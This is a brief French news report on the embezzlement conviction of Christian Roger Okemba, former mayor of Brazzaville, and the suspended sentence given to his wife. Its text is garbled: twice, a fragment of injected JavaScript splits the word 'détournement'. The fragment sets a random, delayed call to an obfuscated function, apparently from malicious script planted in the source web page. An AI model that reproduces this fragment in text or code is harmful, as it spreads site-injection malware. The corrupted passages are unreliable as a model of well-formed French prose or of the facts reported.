Congo : Okemba, ancien maire de Brazzaville condamné à plusieurs années de réclusion criminelle
L’ancien maire de Brazzaville, Christian Roger Okemba, a été condamné samedi de cinq ans de prison pour dédom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tournement de fonds publics, selon un verdict annoncé au terme de près de deux semaines de procédures judiciaires.
Son épouse, Anastasie Eléonore Okemba, ancienne directrice de l’hôpital de Makélékélé, a été accusée de complicité pour se voir infliger une peine de trois ans de prison avec sursis.
M. Okemba était poursuivi pour avoir dédom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tourné, alors qu’il assurait les fonctions de maire de Brazzaville et président du conseil municipal, 1,25 milliard de francs CFA (2,17 millions de dollars), un appui budgétaire du gouvernement destiné à la mairie, ce que dément l’accusé.
“Il n’est pas donné à qui que ce soit de braver les intérêts de la vie en communauté. Nous sommes ici pour le triomphe de la légalité”, a affirmé le procureur général, Michel Oniangué, à l’ouverture du procès.